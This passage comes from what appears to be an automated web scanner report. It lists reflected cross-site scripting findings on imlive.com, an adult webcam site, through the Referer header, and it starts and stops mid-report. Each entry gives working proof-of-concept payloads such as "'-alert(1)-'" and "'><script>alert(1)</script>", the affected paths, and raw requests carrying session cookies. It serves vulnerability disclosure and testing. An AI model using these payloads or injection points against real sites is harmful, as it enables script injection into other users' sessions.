Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 31786
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
vascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/&rf=http://www.google.com/search?hl=en^q=b2392'-alert(1)-'0c423d5641&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.978. http://imlive.com/live-sex-chats/shemale-couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0352'-alert(1)-'ab159ea3fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f0352'-alert(1)-'ab159ea3fa

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:14 GMT
Connection: close
Content-Length: 91916
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/&rf=http://www.google.com/search?hl=en^q=f0352'-alert(1)-'ab159ea3fa&qs=cat=1^roomid=557&qs=cat=1^roomid=557&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.979. http://imlive.com/live-sex-chats/shemale/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2760'-alert(1)-'c5e2447e511 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2760'-alert(1)-'c5e2447e511

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:39 GMT
Connection: close
Content-Length: 223783
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/&rf=http://www.google.com/search?hl=en^q=e2760'-alert(1)-'c5e2447e511&qs=cat=1^roomid=51&qs=cat=1^roomid=51&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.980. http://imlive.com/live-sex-chats/shy-girl/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1836d'-alert(1)-'bf279291bec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shy-girl/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=1836d'-alert(1)-'bf279291bec

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 165183
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/&rf=http://www.google.com/search?hl=en^q=1836d'-alert(1)-'bf279291bec&qs=cat=1^roomid=160&qs=cat=1^roomid=160&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.981. http://imlive.com/liveexperts.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /liveexperts.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aed8'><script>alert(1)</script>84ff86f7007 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /liveexperts.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7aed8'><script>alert(1)</script>84ff86f7007

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:45 GMT
Connection: close
Content-Length: 19453
Vary: Accept-Encoding


<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp&lr=1107816009&ud=0&pe=liveexperts.asp&rf=http://www.google.com/search?hl=en^q=7aed8'><script>alert(1)</script>84ff86f7007&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.982. http://imlive.com/localcompanionship.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /localcompanionship.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15f39'><script>alert(1)</script>2c5aaf7e464 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /localcompanionship.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=15f39'><script>alert(1)</script>2c5aaf7e464

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:47 GMT
Connection: close
Content-Length: 16612
Vary: Accept-Encoding


<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp&lr=1107816009&ud=0&pe=localcompanionship.asp&rf=http://www.google.com/search?hl=en^q=15f39'><script>alert(1)</script>2c5aaf7e464&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.983. http://imlive.com/login.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /login.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266c7'-alert(1)-'ee0d8af970d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=266c7'-alert(1)-'ee0d8af970d

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:27 GMT
Connection: close
Content-Length: 21496
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=266c7'-alert(1)-'ee0d8af970d&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.984. http://imlive.com/minglesingles.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /minglesingles.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31ad7'><script>alert(1)</script>1b6d1621049 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /minglesingles.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=31ad7'><script>alert(1)</script>1b6d1621049

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:45 GMT
Connection: close
Content-Length: 16176
Vary: Accept-Encoding


<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp&lr=1107816009&ud=0&pe=minglesingles.asp&rf=http://www.google.com/search?hl=en^q=31ad7'><script>alert(1)</script>1b6d1621049&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.985. http://imlive.com/pr.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /pr.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa9af'><script>alert(1)</script>4ba405bce21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=fa9af'><script>alert(1)</script>4ba405bce21

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
